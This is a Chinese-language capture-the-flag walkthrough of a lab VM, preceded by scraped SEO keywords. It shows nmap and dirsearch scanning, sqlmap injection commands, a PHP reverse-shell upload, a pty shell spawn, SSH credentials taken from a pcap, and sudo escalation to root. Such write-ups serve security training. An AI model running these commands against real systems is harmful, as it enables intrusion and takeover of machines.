天津网站建设技术外包,小猫mip网站建设,百度收录提交查询,网站开发的分录怎么做靶机设置
设置靶机为NAT模式
靶机IP发现
nmap 192.168.112.0/24 靶机IP为192.168.112.143
目录扫描
dirsearch 192.168.112.143 访问浏览器 提示让我们扫描更多的目录
换个更大的字典#xff0c;扫出来一个 /nt4stopc/ 目录
目录拼接
拼接 /nt4stopc/ 发现页面中有很多…靶机设置
设置靶机为NAT模式
靶机IP发现
nmap 192.168.112.0/24 靶机IP为192.168.112.143
目录扫描
dirsearch 192.168.112.143 访问浏览器 提示让我们扫描更多的目录
换个更大的字典扫出来一个 /nt4stopc/ 目录
目录拼接
拼接 /nt4stopc/ 发现页面中有很多判断题
对为1错为0
按顺序判断下来为 0110111001
拼接访问页面 SQL注入
点击网页发现存在id参数
尝试测试sql注入 python sqlmap.py -u http://192.168.112.143/nt4stopc/0110111001/summertimesummertime/go.php?id1 --batch
果然发现存在sql注入 python sqlmap.py -u http://192.168.112.143/nt4stopc/0110111001/summertimesummertime/go.php?id1 --dbs --batch
查看当前数据库 查看tatil表
python sqlmap.py -u http://192.168.112.143/nt4stopc/0110111001/summertimesummertime/go.php?id1 -D tatil --tables --batch 字段内容为 hihijrijrijr-balrgralrijr-htjrzhujrz-bfnf folder upload.php
进行解码 uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas
再次拼接 再次拼接
拼接upload.php 发现文件上传点但是没有提交按钮自己添加一个 添加成功
getshell
kali生成反弹shell
locate php-reverse-shell.php
cp /usr/share/webshells/php/php-reverse-shell.php . 开启监听
上传文件 http://192.168.112.143/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/osas/2ad6bded962b884337eaeb921d7c2764.php
md5加密后访问文件 提权
生成交互式shell
python3 -c import pty;pty.spawn(/bin/bash) 在 /var/www/html 下看见important.pcapng文件查看他
发现有一个email信息 url解码后得到
emailmkelepcemessageHello there, The password for the SSH account you want is: mkelepce:mklpc-osas112. If you encounter a problem, just mail it. Good work
账号 mkelepce
密码mklpc-osas112. 登陆成功
sudo -l查看免密操作
发现可以进行任何操作
直接sudo su 提权成功